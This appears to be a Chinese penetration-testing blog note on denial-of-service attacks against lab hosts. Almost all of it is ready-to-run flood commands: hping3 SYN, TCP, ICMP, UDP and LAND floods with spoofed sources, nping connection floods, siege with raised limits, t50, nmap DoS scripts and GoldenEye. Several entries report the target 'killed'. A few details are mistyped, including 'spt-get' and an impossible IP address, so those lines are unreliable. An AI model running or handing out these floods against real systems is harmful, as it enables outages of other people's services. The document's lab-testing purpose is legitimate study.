【渗透测试笔记】之【拒绝服务攻击】

Hping3

几乎可以发送任何TCP/IP 数据包,用于测试FW、端口扫描、性能测试。

Syn Flood 攻击

方式1

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.2.100
#-c:发多少个包
#-d:数据段有多大
#-S:Syn数据包
#-w:tcp头window的大小(默认就是64)
#-p:攻击目标端口
#--flood:以flood 方式发送
#--rand-source:随机源地址

此时靶机已经被打死:
在这里插入图片描述

方式2

hping3 -S -P -U -p 80 --flood --rand-source 192.168.2.100

此时靶机同样被打死:
在这里插入图片描述

TCP Flood 攻击

hping3 -SARFUP -p 80 --flood --rand-source 192.168.2.100

ICMP Flood 攻击

hping3 -q -n --icmp -d  200 --flood --rand-source 192.168.2.101
#-n:不解析域名
#-a:伪造源地址

UDP Flood 攻击

hping3 --udp -s 53 -d 100 -p 53 --flood 192.168.2.101

LAND 攻击

特殊类型SYN Flood 攻击
源地址和目标地址都是受害者,受害者与自己完成三次握手。

hping3 -n -a 192.168.2.101 -S -d 100 -p 80 --flood 192.168.2.101

Nping

TCP 全连接 DoS 攻击

nping --tcp-connect --rate=10000 -c 100000000 -q 192.168.2.101

成功打死:
在这里插入图片描述

Siege

http(s) 压力测试工具,模拟多个用户并发访问。
安装:

spt-get install siege

修改上限:

vi /etc/siege/siegerc

limit 255改为limit 100000

siege -i -c -t 5 1000 http://192.168.2.101/dvwa/login.php -A Useragent -vv
#-i:模拟用户
#-c:用户数量
#-t:持续5分钟
#-A:Useragent

"concurrency"是实际并发数,取决于攻击方性能。

T50 压力测试

t50 192.168.2.101 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.2.101 --flood --turbo -S --protocol TCP UDP OSPF EIGRP --dport 80

Nmap

进入nmap脚本目录:

cd /usr/share/nmap/scripts
cat script.db | grep dos | cut -d "\"" -f 2

使用方法:

nmap -p445 --script=smb-vuln-ms10-054.nse 1.1.1.1

GoldenEye

下载地址:https://github.com/jseidl/GoldenEye/archive/master.zip

使用方法:

./goldeneye.py http://192.18.2.2.102 -w 500 -s 10 -m random

效果明显,直接打死
在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值